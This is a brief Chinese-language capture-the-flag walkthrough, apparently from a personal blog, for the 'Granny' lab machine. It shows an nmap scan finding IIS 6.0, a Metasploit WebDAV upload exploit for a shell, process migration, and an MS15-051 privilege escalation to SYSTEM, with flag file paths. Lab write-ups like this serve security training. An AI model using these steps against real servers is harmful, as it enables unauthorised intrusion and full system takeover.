http://blog.yutian233.xyz/
靶机描述
清单
-
信息搜集
- nmap
- iis 6
-
获取shell
- iis_webdav_upload_asp
-
提权
- ms15_051_client_copy_image
信息搜集
靶机IP
端口扫描
nmap 10.10.10.15 -A
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
得到了 IIS 版本为 6.0
MSF
use exploit/windows/iis/iis_webdav_upload_asp
得到了一个低权限用户
System
use post/multi/recon/local_exploit_suggester
这是使用到的是图中标红的
在提权之前需要先迁移 pid
meterpreter > getpid
Current pid: 3592
# 获取msfshell 的pid
PID迁移
meterpreter > migrate 2676
[*] Migrating from 3592 to 2676...
[*] Migration completed successfully.
接下来就可以 run
得到 SYSTEM
root.txt
- C:\Documents and Settings\Administrator\Desktop
user.txt
- C:\Documents and Settings\Lakis\Desktop